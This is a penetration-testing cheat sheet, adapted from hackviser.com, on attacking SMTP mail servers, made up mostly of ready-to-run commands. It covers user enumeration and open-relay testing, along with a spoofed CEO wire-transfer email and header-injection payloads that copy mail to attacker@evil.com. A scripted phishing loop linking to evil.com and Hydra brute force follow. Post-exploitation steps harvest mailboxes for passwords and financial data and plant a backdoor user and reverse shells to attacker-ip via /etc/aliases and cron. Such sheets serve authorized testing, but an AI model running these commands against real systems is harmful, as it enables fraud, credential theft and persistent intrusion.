// notes/ Service Enumeration
✉️

SMTP — Enumeration & Attacks

Connect, enumerate users (VRFY/EXPN/RCPT), open-relay testing, spoofing, injection, brute-force, and post-exploitation on port 25/465/587.

#smtp#port 25#465#587#enumeration#phishing
source · hackviser.com

SMTP (Simple Mail Transfer Protocol)

Default Ports: 25 (SMTP), 465 (SMTPS), 587 (Submission)

SMTP is a text-based push protocol used by mail servers to transmit email. It's frequently abused for phishing, spam, user enumeration, spoofing, and information disclosure. Anything internet-facing on 25/465/587 deserves a careful look.


Connect

Using Telnet

bash
$# Connect to SMTP server
$telnet target.com 25
$
$# Basic SMTP conversation
$EHLO attacker.com
$MAIL FROM:<sender@attacker.com>
$RCPT TO:<victim@target.com>
$DATA
$Subject: Test
$Test message
$.
$QUIT

Using netcat

bash
$nc target.com 25
$
$# With SSL (if supported)
$openssl s_client -connect target.com:465 -crlf -quiet

Using swaks

bash
$# Send test email
$swaks --to victim@target.com --from sender@attacker.com --server target.com
$
$# With authentication
$swaks --to victim@target.com --from user@target.com \
$ --auth-user user@target.com --auth-password password \
$ --server target.com
$
$# With attachment
$swaks --to victim@target.com --from sender@attacker.com \
$ --attach /path/to/file.pdf \
$ --server target.com

Using sendemail

bash
$sendemail -f sender@attacker.com -t victim@target.com \
$ -u "Subject" -m "Message body" -s target.com:25
$
$# With authentication
$sendemail -f user@target.com -t victim@target.com \
$ -u "Subject" -m "Message" \
$ -s target.com:587 \
$ -xu user@target.com -xp password

Recon

Service Detection with Nmap

bash
$nmap -p 25,465,587 target.com

Banner Grabbing

bash
$# netcat
$nc target.com 25
$echo "EHLO test" | nc target.com 25
$
$# telnet
$telnet target.com 25
$
$# nmap
$nmap -p 25 -sV target.com

MX Record Discovery

bash
$# Find mail servers for domain
$dig +short MX target.com
$nslookup -type=MX target.com
$host -t MX target.com
$
$# All MX records
$dig MX target.com
$
$# SPF
$dig +short TXT target.com | grep "v=spf1"
$
$# DMARC
$dig +short TXT _dmarc.target.com

Enumeration

SMTP Server Assessment

bash
$# Enumerate supported SMTP commands
$nmap -p 25 --script smtp-commands target.com
$
$# User enumeration via VRFY/EXPN
$nmap -p 25 --script smtp-enum-users target.com
$
$# Extract NTLM authentication details
$nmap -p 25 --script smtp-ntlm-info target.com
$
$# Run all SMTP scripts
$nmap -p 25,465,587 --script smtp-* target.com

User Enumeration

VRFY

bash
$telnet target.com 25
$VRFY admin
$VRFY root
$VRFY user
$
$smtp-user-enum -M VRFY -U users.txt -t target.com

EXPN

bash
$telnet target.com 25
$EXPN admin
$EXPN all
$EXPN staff
$
$smtp-user-enum -M EXPN -U users.txt -t target.com

RCPT TO

bash
$telnet target.com 25
$MAIL FROM:<test@example.com>
$RCPT TO:<admin@target.com>
$# 250 OK = user exists
$# 550 User unknown = doesn't exist
$
$smtp-user-enum -M RCPT -U users.txt -t target.com -f sender@example.com

Command Enumeration

bash
$telnet target.com 25
$EHLO attacker.com
$
$# Response shows:
$# 250-SIZE
$# 250-VRFY
$# 250-ETRN
$# 250-STARTTLS
$# 250-AUTH PLAIN LOGIN
$# 250 HELP

Attack Vectors

Open Relay Testing

bash
$# External to external
$telnet target.com 25
$MAIL FROM:<external1@example.com>
$RCPT TO:<external2@anotherdomain.com>
$DATA
$Test
$.
$
$# nmap
$nmap -p 25 --script smtp-open-relay target.com
$
$# swaks
$swaks --to external@domain.com --from external@otherdomain.com --server target.com

Email Spoofing

bash
$telnet target.com 25
$EHLO attacker.com
$MAIL FROM:<ceo@target.com>
$RCPT TO:<employee@target.com>
$DATA
$From: CEO <ceo@target.com>
$To: employee@target.com
$Subject: Urgent: Wire Transfer
$
$Please transfer $50,000 to account XYZ immediately.
$.
$QUIT
$
$# sendemail one-shot
$sendemail -f ceo@target.com -t employee@target.com \
$ -u "Urgent: Wire Transfer" \
$ -m "Please transfer funds..." \
$ -s target.com:25

SMTP Injection

bash
$# Header injection in web forms that send email
$Email: victim@target.com%0ACc:attacker@evil.com
$Email: victim@target.com%0ABcc:attacker@evil.com
$Email: victim@target.com%0AFrom:admin@target.com
$
$# Body injection
$Message: Test%0A.%0AMAIL FROM:<attacker@evil.com>%0ARCPT TO:<victim2@target.com>%0ADATA%0APhishing email%0A.
$
$# CRLF injection
$Subject: Test%0D%0ACc:attacker@evil.com

Phishing Campaign

bash
$cat > targets.txt <<EOF
$victim1@target.com
$victim2@target.com
$victim3@target.com
$EOF
$
$while read email; do
$ swaks --to $email \
$ --from support@target.com \
$ --server target.com \
$ --header "Subject: Password Reset Required" \
$ --body "Click here: http://evil.com/phishing"
$done < targets.txt

Brute Force

bash
$# Hydra
$hydra -l user@target.com -P passwords.txt smtp://target.com:587
$hydra -L users.txt -P passwords.txt smtp://target.com:587
$
$# Metasploit
$use auxiliary/scanner/smtp/smtp_enum
$set RHOSTS target.com
$run

Post-Exploitation

Email Harvesting

bash
$# Read mail spool
$cat /var/mail/username
$cat /var/spool/mail/username
$
$# Maildir format
$ls -la /home/username/Maildir/cur/
$cat /home/username/Maildir/cur/*
$
$# Pull out all email addresses
$grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' /var/mail/*

Mail Queue Manipulation

bash
$mailq # view queue
$postcat -q QUEUE_ID # read queued message
$postfix flush # flush queue
$postsuper -d QUEUE_ID # delete one
$postsuper -d ALL # delete all

Data Exfiltration

bash
$grep -r -i "password\|secret\|confidential" /var/mail/
$find /var/mail/ -name "*.pdf" -o -name "*.doc" -o -name "*.xls"
$grep -r -i "account\|routing\|ssn\|credit" /var/mail/

Persistence

bash
$# Backdoor user
$useradd -m -s /bin/bash backdoor
$echo "backdoor:password" | chpasswd
$
$# Alias-based backdoor
$echo "backdoor: |/bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" >> /etc/aliases
$newaliases
$
$# Cron
$echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" | crontab -

Common SMTP Commands

CommandDescriptionUsage
HELOIdentify clientHELO client.com
EHLOExtended HELOEHLO client.com
MAIL FROMSender addressMAIL FROM:<sender@domain.com>
RCPT TORecipientRCPT TO:<recipient@domain.com>
DATAMessage contentDATA
VRFYVerify userVRFY admin
EXPNExpand listEXPN all
RSETResetRSET
NOOPNo operationNOOP
QUITCloseQUIT

SMTP Response Codes

CodeMeaningDescription
220Service readyServer ready
250OKCommand successful
354Start inputReady for message
421Service not availableServer closing
450Mailbox unavailableTemporary failure
550Mailbox unavailablePermanent failure
551User not localRelay denied
552Storage exceededQuota exceeded
553Mailbox name invalidBad address

Useful Tools

ToolDescriptionPrimary Use
telnetTerminal emulatorManual testing
netcatNetwork utilityConnection testing
swaksSMTP test toolEmail sending
smtp-user-enumUser enumerationFinding valid users
sendemailEmail senderPhishing campaigns
MetasploitExploitation frameworkAutomated testing
NmapNetwork scannerService detection

Security Misconfigurations

  • ❌ Open relay configuration
  • ❌ VRFY/EXPN enabled
  • ❌ No authentication required
  • ❌ Weak authentication
  • ❌ No SPF/DMARC records
  • ❌ No TLS encryption
  • ❌ Verbose error messages
  • ❌ No rate limiting
  • ❌ Information disclosure via NTLM
  • ❌ Outdated mail server software

Source: adapted from hackviser.com – SMTP.